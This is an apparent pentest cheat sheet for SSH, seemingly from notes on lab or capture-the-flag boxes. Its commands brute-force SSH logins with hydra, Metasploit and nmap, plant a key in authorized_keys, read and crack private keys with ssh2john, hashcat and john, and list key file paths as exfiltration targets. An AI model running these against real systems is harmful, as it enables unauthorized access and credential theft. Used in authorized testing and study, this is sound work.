22 - SSH
Usage
ssh user1@10.10.10.10 -p 2222 'ls /home/user1/'# Local to remote (upload)
scp file1 user@172.16.10.10:/tmp/file1
# Remote to local (download)
scp user@172.16.10.10:/tmp/file1 ./file1If error messages pop up, try -O:
$ scp -i id_rsa ./authorized_keys bob@sorc:/home/bob/.ssh/authorized_keys
scp: Received message too long 1094927173
scp: Ensure the remote shell produces no output for non-interactive sessions.
$ scp -O -i id_rsa ./authorized_keys bob@sorc:/home/bob/.ssh/authorized_keys# Generate key pair
$ ssh-keygen -t rsa -f ~/.ssh/id_rsa -N ''
# Add public key to authorized keys
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
# Read private key
$ cat .ssh/id_rsaAuth Methods
Supported authentication methods.
nmap -p22 -script=ssh-auth-methods <IP>Audit
$ ssh-audit 192.168.0.24
# general
(gen) banner: SSH-1.99-OpenSSH_2.9p2
(gen) protocol SSH1 enabled
(gen) software: OpenSSH 2.9p2
(gen) compatibility: OpenSSH 2.5.0-6.6, Dropbear SSH 0.47-0.52
(gen) compression: enabled (zlib)
<SNIP>Brute Force
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.0.24:22 -t 4$ msfconsole -q
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/ssh/ssh_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.57.134
RHOSTS => 192.168.57.134nmap -p 22 --script ssh-brute potatoPPK to PEM
Convert a Putty user key file (.ppk) to an SSH .pem file.
# Converting PPK to PEM
sudo puttygen key.ppk -O private-openssh -o key.pem
# Assigning the appropriate permissions
sudo chmod 600 key.pem
# Confirming permissions
ls -l key.pem
# Using public key authentication
ssh root@10.10.11.227 -i key.pemFor an example of the above process check Keeper.
Private Keys
# converting the private key into a hashcat-friendly format
$ ssh2john id_rsa > ssh.hash$ cat ssh.hash
id_rsa:$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e737<SNIP>
# removing the 'id_rsa' username
$ nano ssh.hash
$ cat ssh.hash
$sshng$6$16$7059e78a8d3764ea1e883fcdf592feb7$1894$6f70656e737<SNIP>$ hashcat -h | grep -i "ssh"
<SNIP>
22921 | RSA/DSA/EC/OpenSSH Private Keys ($6$) | Private Key
# might not work
$ hashcat -m 22921 ssh.hash ssh.passwords
# this will probably work
$ john --wordlist=ssh.passwords ssh.hashKey Types
SSH supports multiple key types, each with a default filename, thus, when trying to exfiltrate one don't just search for id_rsa!
Key Type
Private Key File
Public Key File
RSA
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
ECDSA
~/.ssh/id_ecdsa
~/.ssh/id_ecdsa.pub
ED25519
~/.ssh/id_ed25519
~/.ssh/id_ed25519.pub
DSA (old)
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
ECDSA and ED25519 are newer and generally faster/smaller than RSA.
ED25519 is currently the recommended default for many systems (
ssh-keygendefaults to it now).RSA is still widely supported, but 4096-bit keys are preferred now due to security standards.
Last updated
Was this helpful?